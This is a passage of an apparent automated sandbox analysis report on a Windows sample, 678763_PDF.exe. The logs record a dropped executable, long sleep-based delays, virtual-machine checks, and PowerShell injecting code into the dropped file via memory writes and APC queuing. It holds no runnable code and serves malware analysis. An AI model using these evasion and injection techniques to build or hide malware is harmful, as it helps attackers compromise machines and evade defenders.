            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8238Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1409Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeWindow / User API: threadDelayed 7930Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeWindow / User API: threadDelayed 1899Jump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeAPI coverage: 0.0 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8076Thread sleep count: 7930 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599641s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8076Thread sleep count: 1899 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599516s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599406s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598828s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598719s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598594s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598484s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598375s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598265s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598156s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -598047s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597938s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597813s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597594s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe TID: 8072Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Users\user\Desktop\678763_PDF.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405C63
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_00402910 FindFirstFileW,6_2_00402910
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeCode function: 6_2_004068B4 FindFirstFileW,FindClose,6_2_004068B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599516Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598719Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598484Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 598047Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597938Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597813Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeThread delayed: delay time: 594110Jump to behavior
            Source: powershell.exe, 00000001.00000002.2144153415.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\^q
            Source: powershell.exe, 00000001.00000002.2144153415.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\^q
            Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: 678763_PDF.exe, 00000000.00000002.1725978609.00000000007D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1476a1d87ad0<
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.2144153415.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\^q
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6"
            Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd144b65092187<
            Source: Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004BDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@d
            Source: C:\Users\user\Desktop\678763_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-3285
            Source: C:\Users\user\Desktop\678763_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-3437
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeAPI call chain: ExitProcess graph end nodegraph_6-7946
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeAPI call chain: ExitProcess graph end nodegraph_6-7941
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe base: 16D0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe "C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
